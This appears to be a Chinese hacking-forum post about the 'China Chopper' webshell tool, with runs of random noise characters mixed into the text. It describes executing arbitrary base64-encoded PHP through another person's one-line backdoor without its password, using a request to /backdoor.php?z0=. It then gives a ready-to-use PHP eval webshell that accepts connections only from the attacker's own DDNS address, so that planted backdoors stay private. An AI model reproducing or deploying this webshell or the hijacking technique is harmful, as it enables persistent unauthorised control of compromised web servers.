今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞( k9 u3 s! l: k6 c
/ U5 C% H: v3 c2 I2 } b# [就算你设置了密码,使用了eval($_REQUEST['moyo']);
* T0 Q: @% m/ t+ R1 n& c
, s& s- V9 |* O A, ]& l2 X但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门/ L/ `8 M1 }1 j" \1 G) w) ~
' H/ A: ~- |- ?8 l/ R1 q因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));
2 u" R9 }5 H2 l+ s! W; G+ U5 e& X0 \! P; W0 s& j
直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了) ?/ m ^: I* i! J) D3 S8 j0 {$ x
& V, S7 [/ R7 w. a7 N& z& D; J3 m
不知道是设计缺陷还是故意留的后门
0 t% v. `, W, E: {! Q4 d
2 q; O# V* J e8 u$ N如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
% H: L" ^8 j9 E9 R9 D/ f3 ^; T9 W' e- u: w9 v) p `! s1 N6 ^
本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org
* a6 w8 A( R% m% Y- @# u
* R1 {7 P5 f1 i( C! k3 R然后一句话后门这样写3 I9 Y/ [! T ~4 w
9 P% ~2 ~$ T. ]$ n
<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>
" b; n7 G4 N$ m5 P5 B4 j这样就可以让一句话后门只允许自己的电脑连接了; J( E- D3 I/ o
. I! W0 o3 p& H: t s( L9 o |